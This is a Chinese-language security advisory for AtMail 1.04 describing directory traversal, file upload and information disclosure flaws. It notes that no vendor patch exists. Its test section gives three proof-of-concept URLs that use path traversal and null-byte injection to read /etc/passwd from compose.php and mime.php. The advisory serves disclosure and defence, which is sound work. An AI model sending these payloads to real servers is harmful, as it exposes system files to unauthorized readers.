AtMail多个安全漏洞

发布日期:2012-03-22
更新日期:2012-03-27

受影响系统:
@Mail Atmail 1.04
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52684

Atmail是商业化Linux消息传送平台提供者。

AtMail在实现上存在多个目录遍历、任意文件上传、信息泄露漏洞,攻击者可利用这些漏洞获取敏感信息、上传和运行任意代码。

<*来源:Yury Maryshev 
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://www.example.com/compose.php?func=renameattach&amp;unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&amp;Attachment[]=/../../../../../../../../../etc/passwd

https://www.example.com/compose.php?func=renameattach&amp;unique=1.txt%00&amp;Attachment[]=/../../../../../../../../../etc/passwd

https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&amp;name=positive.html

建议:
--------------------------------------------------------------------------------
厂商补丁:

@Mail
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwgjjz.html